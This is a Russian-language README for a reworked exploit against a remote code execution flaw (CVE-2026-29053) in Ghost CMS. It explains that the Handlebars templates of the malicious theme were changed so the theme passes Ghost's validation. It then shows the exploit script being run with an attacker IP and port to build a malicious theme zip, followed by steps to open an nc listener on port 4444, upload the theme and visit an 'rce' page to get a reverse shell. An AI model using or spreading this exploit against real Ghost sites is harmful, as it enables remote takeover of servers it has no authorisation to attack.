
(Уязвимость удалённого выполнения кода (RCE), обнаруженная в Ghost CMS (затрагивает версии с 0.7.2 по 6.19.0))
Это переработка репозитория от rootxran для этой же CVE - https://github.com/rootxran/CVE-2026-29053
Во время тестирования в определённых средах Ghost CMS исходная тема-пейлоад вызывала фатальную ошибку Handlebars. CMS не смогла активировать вредоносную тему, потому что в файле author.hbs использовался устаревший или отсутствующий хелпер (social_url).
Я обновил шаблоны Handlebars, используя нативные, совместимые хелперы. Это гарантирует, что тема проходит внутренние проверки валидации Ghost, что позволяет эксплойту активироваться успешно, не блокируясь парсером безопасности движка тем.
Использование: (обратитесь к оригинальному эксплойту для видеоинструкции).
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/